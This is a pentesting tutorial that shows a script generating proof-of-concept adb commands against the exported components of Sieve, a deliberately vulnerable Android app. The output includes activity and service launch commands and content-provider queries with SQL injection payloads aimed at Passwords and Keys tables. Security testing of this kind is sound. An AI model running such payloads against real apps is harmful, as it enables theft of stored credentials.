Automating Attack Payloads

The apk-components-inspector is a Python3 script that analyzes an APK file, lists the exported app components, and generates proof-of-concept payloads needed to attack the application. While the script does an amazing job at generating these payloads, they may require some slight modifications by the tester to get them to fully work. Still, they work most of the time and will reduce the time needed to get a functional payload.

Here are the options for the script:

% python3 apk-components-inspector.py
╭──────────────── APK Components Inspector ────────────────╮
│                 APK Components Inspector                 │
│                 v1.1 by Sandeep Wawdane                  │
│                                                          │
│ Usage: python3 apk-components-inspector.py <apk_file>    │
│ Options:                                                 │
│   -o, --output  Save results to JSON file                │
│   -v, --verbose Enable verbose output                    │
│   -q, --quiet   Suppress progress messages only          │
│   -c, --cleanup Remove decompiled files after analysis   │
│   -a, --all     Include non-exported activities          │
╰──────────────────────────────────────────────────────────╯

Here is an example of the script using the Sieve application. It starts off with the analysis of the APK file.

% python apk-components-inspector.py -o sieve_output.txt sieve.apk 
Decompiling sieve.apk...
✓ Successfully decompiled to sieve_decompiled
Parsing AndroidManifest.xml...
Analyzing components...
Analyzing activity (exported): com.withsecure.example.sieve.activity.MainLoginActivity
Analyzing activity (exported): com.withsecure.example.sieve.activity.FileSelectActivity
Analyzing activity (exported): com.withsecure.example.sieve.activity.PWList
Analyzing service (exported): com.withsecure.example.sieve.service.AuthService
Analyzing service (exported): com.withsecure.example.sieve.service.CryptoService
Analyzing receiver (exported): androidx.profileinstaller.ProfileInstallReceiver
Analyzing provider (exported): com.withsecure.example.sieve.provider.DBContentProvider
Analyzing provider (exported): com.withsecure.example.sieve.provider.FileBackupProvider
Generating exploits...
Note: Receiver androidx.profileinstaller.ProfileInstallReceiver requires permission android.permission.DUMP,
skipping.

✓ Results saved to: sieve_output.txt
───────────────────────────────────────────────────────────────────────────
Package: com.withsecure.example.sieve
Exported Components: 8
───────────────────────────────────────────────────────────────────────────
Component                Type       Status     Exploits
MainLoginActivity        activity   exported   3
FileSelectActivity       activity   exported   1
PWList                   activity   exported   1
AuthService              service    exported   2
CryptoService            service    exported   2
ProfileInstallReceiver   receiver   exported   0
DBContentProvider        provider   exported   10
FileBackupProvider       provider   exported   2
───────────────────────────────────────────────────────────────────────────

Following that, it generates the proof-of-concept payloads for each component. The first set are the Activities.

# Activities ADB Commands:

MainLoginActivity (exported)
# Action: android.intent.action.MAIN
adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.MainLoginActivity -a android.intent.action.MAIN -c android.intent.category.LAUNCHER
# Extras: com.withsecure.example.sieve.PIN(string)
adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.MainLoginActivity --es com.withsecure.example.sieve.PIN "test_string"
# singleTask mode
adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.MainLoginActivity --activity-clear-task

FileSelectActivity (exported)
adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.FileSelectActivity

PWList (exported)
# Extras: com.withsecure.example.sieve.KEY(string), _id(string)
adb shell am start -n com.withsecure.example.sieve/com.withsecure.example.sieve.activity.PWList --es com.withsecure.example.sieve.KEY "test_string" --es _id "test_string"

Next are the Services.

# Services ADB Commands:

AuthService (exported)
adb shell am startservice -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.AuthService
# Foreground service
adb shell am start-foreground-service -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.AuthService

CryptoService (exported)
adb shell am startservice -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.CryptoService
# Foreground service
adb shell am start-foreground-service -n com.withsecure.example.sieve/com.withsecure.example.sieve.service.CryptoService

Following that are the Providers.

# Provider ADB Commands:

DBContentProvider (exported)
# Query
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/selectionArgs"
# Query with injection payload
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/selectionArgs" --where "1=1--"
# Query
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys"
# Query with injection payload
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys" --where "1=1--"
# Query
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords"
# Query with injection payload
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords" --where "1=1--"
# Query
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/values"
# Query with injection payload
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/values" --where "1=1--"
# Query
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys/*"
# Query with injection payload
adb shell content query --uri "content://com.withsecure.example.sieve.provider.DBContentProvider/Keys/*" --where "1=1--"

FileBackupProvider (exported)
# Query
adb shell content query --uri "content://com.withsecure.example.sieve.provider.FileBackupProvider"
# Query with injection payload
adb shell content query --uri "content://com.withsecure.example.sieve.provider.FileBackupProvider" --where "1=1--"

To have the script automatically clean up the directory created by apktool, use the -c option. The -o option saves the results in JSON format to a file on your computer; the text is still printed to stdout in your terminal as well.

% python apk-components-inspector.py -c -o sieve_output.txt sieve.apk 

References

https://github.com/thecybersandeep/apk-components-inspector